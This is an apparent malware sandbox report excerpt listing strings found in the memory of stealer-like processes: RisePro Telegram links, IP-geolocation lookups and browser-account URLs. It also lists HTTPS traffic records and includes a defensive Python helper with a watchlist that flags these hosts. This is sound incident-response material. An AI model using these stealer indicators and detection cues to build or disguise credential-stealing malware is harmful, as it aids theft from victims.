Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.000000000124D000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.00000000017A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52
Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.526
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52E
Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52L
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52
Source: c884f8452a.exe, 00000024.00000002.3143187486.000000000058D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52#&K
Source: powershell.exe, 0000000B.00000002.2803800897.0000029E9006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: MPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: MPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.5UHK
Source: c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.WU
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.000000000136D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.0000000001218000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.0000000000568000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000176E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: c884f8452a.exe, 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT%
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTYo
Source: MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTrs
Source: RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.0000000001815000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot
Source: RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot(m
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_botP
Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botlater
Source: RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botlater9
Source: c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botomania
Source: RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botrisepW
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botrisepro
Source: c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: MPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/4P8.
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/=
Source: c884f8452a.exe, 00000014.00000003.2983852225.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2980828476.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2967717535.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2990613852.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2968806377.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2977343403.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2985210515.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2979590771.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2961847631.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2972083170.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963538373.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2970867053.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2974258010.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: c884f8452a.exe, 00000014.00000003.2983852225.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2980828476.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2967717535.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2990613852.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2968806377.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2977343403.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2985210515.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2979590771.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2961847631.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2972083170.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963538373.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2970867053.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2974258010.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/ata
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/
Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/)P
Source: c884f8452a.exe, 00000014.00000003.2983852225.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2980828476.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2967717535.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2990613852.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2968806377.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2977343403.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2985210515.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2979590771.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2961847631.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2972083170.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963538373.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2970867053.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2974258010.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/irefox
Source: 831840b410.exe, 0000002F.00000003.3475843478.00000000040CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account7
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountA
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountJ
Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3110190311.00000000037C9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3087346454.00000000037C2000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3086571979.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3085650788.0000000003780000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3086442731.00000000037A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountL
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountM)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountT)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountd
Source: 831840b410.exe, 0000001F.00000003.3234149280.0000000004060000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000002.3243043765.0000000004062000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountfmF(
Source: 831840b410.exe, 00000010.00000003.3105319797.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3102067403.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountp
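The memory-string hits above are raw and noisy: the same URL recurs with different trailing residue bytes (https://db-ip.com/J, https://t.me/risepro_botlater), one entry can name several processes and memory dumps, and the 443 traffic entries that follow list each session twice, once per direction. The Python below is an added triage helper, not part of the Joe Sandbox report or of the analysed sample. It parses lines in the report's own layout into a per-host view, flags hosts that are benign on their own but high-signal inside a stealer's memory (ipinfo.io, db-ip.com, t.me), pulls out the IPv4 literal the processes submitted for lookup (81.181.57.52 in this run), and counts 443 sessions once. The sample lines are copied from the entries above; the watchlist and its reasons are this example's choice, and reading the first hex field of an .sdmp name as the analysis's process index is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample input: lines copied from the report's "String found in
# binary or memory" and "Network traffic detected" entries.
SAMPLE_LINES = [
    "Source: powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon",
    "Source: RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/J",
    "Source: c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52",
    "Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52",
    "Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botlater",
    "Source: 831840b410.exe, 0000002F.00000003.3475843478.00000000040CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account",
    "Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443",
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742",
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842",
]

STRING_RE = re.compile(r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<url>\S+)\s*$")
TRAFFIC_RE = re.compile(r"^Source: unknown Network traffic detected: HTTP traffic on port (?P<src>\d+) -> (?P<dst>\d+)\s*$")
# "<process>, <dump name>.sdmp" pairs inside the Source: field
SOURCE_RE = re.compile(r"([^\s,]+), ([0-9A-Fa-f.]+\.sdmp)")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Hosts that are harmless on their own but high-signal in a stealer's memory.
# The list and the reasons are this example's choice, not the report's.
WATCHLIST = {
    "ipinfo.io": "public-IP geolocation lookup (victim profiling)",
    "db-ip.com": "public-IP geolocation lookup (victim profiling)",
    "t.me": "Telegram channel referenced by the payload",
}


def parse_sources(field):
    """Return [(process_name, process_index)] from the comma-joined Source field.

    Assumption: the first dotted hex field of an .sdmp name is the analysis's
    process index (0x24 -> 36), not the OS PID.
    """
    return [(proc, int(dump.split(".")[0], 16)) for proc, dump in SOURCE_RE.findall(field)]


def parse_string_hit(line):
    """Parse one 'String found in binary or memory' line, or return None."""
    m = STRING_RE.match(line)
    if not m:
        return None
    url = m["url"]
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    # hostname drops ':443' and is unaffected by residue bytes in the path,
    # so https://db-ip.com/J and https://db-ip.com/... collapse to one host.
    host = (parts.hostname or "").lower()
    # IPv4 literals in the path/query are data the process sent to the host.
    ips = set(IPV4_RE.findall(parts.path + "?" + parts.query))
    return {"url": url, "host": host, "ips": ips, "processes": parse_sources(m["sources"])}


def triage(lines):
    """Summarise report lines into hosts, flagged hosts, leaked IPs and 443 sessions."""
    hosts = defaultdict(set)   # host -> processes that held a URL for it
    flagged = {}               # watchlisted host -> reason
    leaked_ips = set()
    tls_client_ports = set()   # one entry per 443 session, keyed by the client port
    for line in lines:
        hit = parse_string_hit(line)
        if hit:
            for proc, _index in hit["processes"]:
                hosts[hit["host"]].add(proc)
            leaked_ips |= hit["ips"]
            if hit["host"] in WATCHLIST:
                flagged[hit["host"]] = WATCHLIST[hit["host"]]
            continue
        m = TRAFFIC_RE.match(line)
        if m:
            src, dst = int(m["src"]), int(m["dst"])
            # Each session is listed as "client -> 443" and "443 -> client";
            # keeping only the client side counts it once.
            if dst == 443:
                tls_client_ports.add(src)
            elif src == 443:
                tls_client_ports.add(dst)
    return {
        "hosts": {h: sorted(p) for h, p in hosts.items()},
        "flagged": flagged,
        "leaked_ips": sorted(leaked_ips),
        "tls_sessions": len(tls_client_ports),
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_LINES)
    for host, procs in sorted(summary["hosts"].items()):
        tag = summary["flagged"].get(host, "")
        print(f"{host:20} {', '.join(procs):40} {tag}")
    print("looked-up IPs:", summary["leaked_ips"], "| 443 sessions:", summary["tls_sessions"])
```

Run against the full report instead of the sample, the same host map shows which dropped processes share a network profile (here c884f8452a.exe, MPGPH131.exe and RageMP131.exe all carry the geolocation and Telegram URLs, while 831840b410.exe carries only browser-data strings), which is the grouping a responder needs before mapping processes to the three families named in the detection summary.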
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
